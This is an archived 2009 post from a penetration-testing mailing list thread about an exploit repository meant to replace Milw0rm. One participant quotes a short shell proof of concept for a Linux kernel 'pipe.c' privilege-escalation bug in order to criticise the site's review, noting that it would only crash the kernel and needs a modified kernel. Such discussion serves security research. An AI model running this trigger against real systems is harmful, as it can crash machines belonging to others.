Home page logo
/

pen-test logo Penetration Testing mailing list archives

Re: Possible Milw0rm replacement?
From: Pedro Drimel <pedrodrimel () gmail com>
Date: Tue, 17 Nov 2009 15:01:18 -0200

Note that now some of the applications are available to download
directly from their repositories which is awesome.

2009/11/17 Kevin L. Shaw, CISSP, GCIH <kshaw () eeenterprisesinc com>:
Siim:

One thing I've noticed from the group at Offensive Security is that they
never "give" you anything except a means to start down a path.  Their motto
is "Try Harder" and in fact it is made obvious that any exploit you find in
a repository should be examined and adjusted to serve your purpose.  They
know many of the POCs are not going to fly and leave it up to you to figure
it out or break it down better like you did.  I'm just thankful they brought
something to the community since I don't have the capability to create these
on my own and still complete my day job.  I appreciate you pointing all that
out because it's more for me to figure out and learn too.

Regards,
Kev


Siim Pőder wrote:

Hi

Tom Green wrote:


http://exploits.offensive-security.com/


Just that their review process seems to suck?

"Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability":
while : ; do
  { echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &
  PID=$!
  OUT=$(ps -efl | grep 'sleep 1' | grep -v grep |
       { read PID REST ; echo $PID; } )
  OUT="${OUT%% *}"
  DELAY=$((RANDOM * 1000 / 32768))
  usleep $((DELAY * 1000 + RANDOM % 1000 ))
  echo n > /proc/$OUT/fd/1                 # Trigger defect
done

Not only would that just OOPS the kernel and kill the process, it also
needs a MODIFIED kernel (sleep(n) added to) to even trigger that. The
discoverer himself made that note when he posted the shellscript.

So on first glance it leaves a very professional impression of the site ;)

Siim

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review
Board

Prove to peers and potential employers without a doubt that you can
actually do a proper penetration test. IACRB CPT and CEPT certs require a
full practical examination in order to become certified.
http://www.iacertification.org
------------------------------------------------------------------------





------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually
do a proper penetration test. IACRB CPT and CEPT certs require a full
practical examination in order to become certified.
http://www.iacertification.org
------------------------------------------------------------------------



------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT 
and CEPT certs require a full practical examination in order to become certified.

http://www.iacertification.org
------------------------------------------------------------------------


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault